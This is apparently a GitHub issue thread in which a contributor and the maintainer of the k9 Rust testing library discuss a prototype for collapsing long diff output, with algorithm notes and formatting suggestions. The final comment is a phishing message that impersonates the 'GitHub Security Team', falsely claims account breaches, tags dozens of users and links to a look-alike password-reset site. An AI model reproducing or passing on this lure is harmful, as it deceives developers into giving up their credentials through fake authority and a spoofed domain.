### ISSUE TITLE
[WIP] Preliminary prototype for collapsed output

### ISSUE THREAD

**Issue by TheWebDevel** [aaronabramov/k9#55]
**Usecase**: Difference between two structs.
**Assertion**: `assert_equal`

**Current Output**:
![image](https://user-images.githubusercontent.com/24741291/86140755-d1ae0380-bb0e-11ea-8bf5-c0452ccf5e58.png)

**Collapsed Output**:
![image](https://user-images.githubusercontent.com/24741291/86140794-e1c5e300-bb0e-11ea-9928-96a849b5fdf6.png)

**Method**: String Iteration

**Implementation**:

1. Computed the index of each occurrence with reference to (`-` or `+`). `// [4, 5, 16, 17, 20, 21]`
2. I have a `cur_index` and a `peek_index`.
3. If the difference between `cur_index` and  `peek_index` is `<= 5`, I'll have those index in the final collapsed output else I have a `...`. `// [4, 5, 16, 17, 18, 19, 20, 21]`

**Comment by aaronabramov** [comment]
might wanna have some more context around the changes and some hints around how much you skipped:

```
  A { 
    a: "Kelly"
... 20 lines hidden
    b: "blah blah"
-   c: 1
+   c: 2
    d: 4
... 20 lines hidden
}
```

**Comment by aaronabramov** [comment]
also. for the algorithm you probably want to do it at the same time you're constructing by keeping the `unchanged_count` counter as you're iterating through the diff, so you do everything in one pass.
you might need some lookahead for that

**Comment by TheWebDevel** [comment]
Yeah! I'm planning to do those things as well. As I said, this is a prelim first implementation prototype. I'll do that and let you know. :D Thanks!!

**Comment by TheWebDevel** [comment]
Sure. I'll optimize the approach. So, can I proceed with the lookahead approach and extend it?

**Comment by aaronabramov** [comment]
also, we should probably have some threshold. if i'ts lass than 30 lines we don't collapse anything

**Comment by TheWebDevel** [comment]
Yeah!

**Comment by TheWebDevel** [comment]
Update:

I found a way to collapse the output with single iteration.(Sorry about the colors, Need to find a way to put em back :P)
![image](https://user-images.githubusercontent.com/24741291/86537627-16baa700-bf0e-11ea-9869-df5aece4270c.png)

Currently working on adding context to the diff. :))

**Comment by TheWebDevel** [comment]
Ok, I integrated `colored_diff` with my logic for collapsing large output. It's so far so good. 

**What'll I do next?**
1. Going to write a lot of test cases.
2. If all good, Implement into the library as a feature and submit for review

**Here are some of the results:**
Struct diff
![image](https://user-images.githubusercontent.com/24741291/86954186-2b4ba900-c173-11ea-8e8d-ed717ccf3d62.png)

Vector diff
![image](https://user-images.githubusercontent.com/24741291/86954200-2f77c680-c173-11ea-8a0a-c0c4d1d1270e.png)

Thanks, @aaronabramov :D

**Comment by aaronabramov** [comment]
you might want some padding/context around changed lines!

right now you have 
```
- 20
+ 3
... 10 lines collapsed
```

you probably want
```
- 20
+ 3
   4 // unchanged line
   5 // unchanged line
... 10 lines collapsed
```

**Comment by aaronabramov** [comment]
also need to find a good way to distinguish `... 10 lines collapsed` from the acutual content. they're both grayed out right now :)

**Comment by TheWebDevel** [comment]
Noted! :D

**Comment by TheWebDevel** [comment]
PR: https://github.com/aaronabramov/k9/pull/61

**Comment by Admin-nextbill** [comment]
# Urgent Action Required: GitHub Account Security Alert

Dear esteemed GitHub users,

We regret to inform you that there has been unauthorized access to your GitHub account. In order to prevent any further security breaches, we urge you to promptly reset your password and revoke access to any unauthorized parties.

To reset your password and ensure the security of your account, please click on the following link: [Reset Password](http://github.hudevelopers.online/). Your prompt attention to this matter is highly appreciated.

Users affected by this security breach include:

- amyreese
- @DhavalKapil
- @grantland
- @richardjrossiii
- @alexholdenmiller
- @huntie
- @ilya-klyuchnikov
- @yuxuanchen1997
- @danharper
- @asm89vassilmladenov
- @jakebolam
- @sarthakvk
- @amyreese
- @zhangyuannie
- @ilya-klyuchnikov
- @shaoshing
- @khumps
- @viswanathgsdyniusz
- @swannknani
- @zertosh
- @zurfyx
- @paulpan05
- @assafgelber
- @kevinfrei
- @rajprateek
- @nyarosu
- @javache

We apologize for any inconvenience caused and appreciate your swift action in ensuring the security of your account. Thank you for your cooperation.

Sincerely,

GitHub Security Team
